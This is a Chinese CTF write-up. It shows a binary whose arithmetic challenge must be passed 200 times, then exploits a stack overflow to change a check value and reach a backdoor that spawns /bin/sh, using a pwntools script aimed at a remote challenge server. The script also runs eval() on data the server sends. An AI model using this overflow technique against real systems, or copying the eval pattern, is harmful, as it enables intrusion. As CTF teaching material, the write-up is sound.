题目给定ELF文件一个,经IDA分析为ARM框架的ELF文件,不好调试。
main函数如下
先答对简单数学题目200次进入下一步环节。
do
{
v0 = time(0LL);
v15 = v0;
v1 = srand(v0);
v2 = (unsigned int)((signed int)rand(v1) % 100);
v14 = v2;
v3 = (unsigned int)((signed int)rand(v2) % 100);
v13 = v3;
v4 = (unsigned int)((signed int)rand(v3) % 100);
v12 = v4;
v11 = (signed int)rand(v4) % 100;
printf("there have 200 levels ~");
printf("Math: %d * %d + %d + %d = ???");
printf("input answer:");
read(0LL, &v6, 20LL);
v10 = v14 * v13 + v12 + v11;
v9 = strtol(&v6, 0LL, 10LL);
if ( v10 != v9 )
{
puts("wrong ");
exit(0LL);
}
puts("good !");
++v16;
}
while ( v16 <= 199 );
题目有明显栈溢出漏洞
v8 = 256;
read(0LL, &v7, 110LL);
if ( v8 == 0x12235612 )
{
puts("get it ~");
sub_400920();
}
题目提供预留后门
__int64 sub_400920()
{
return system("/bin/sh");
}
经分析通过v7的数据溢出可以覆盖至v8所在的地址,进行数据修改操作,将v8内的值从256替换至0x12235612即可执行预留后门。
经计算,v8的内存地址和v7的内存地址距离为0xDC-0x78=0x64
exp如下
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level = 'debug'
r=remote('39.97.210.182',40285)
for i in range(200):
r.recvuntil('~Math: ')
math = r.recvuntil('=')[:-1]
r.sendline(str(eval(math)))
r.sendline('a'*0x64+p64(0x12235612))
r.interactive()
全部评论 (暂无评论)
info 还没有任何评论,你来说两句呐!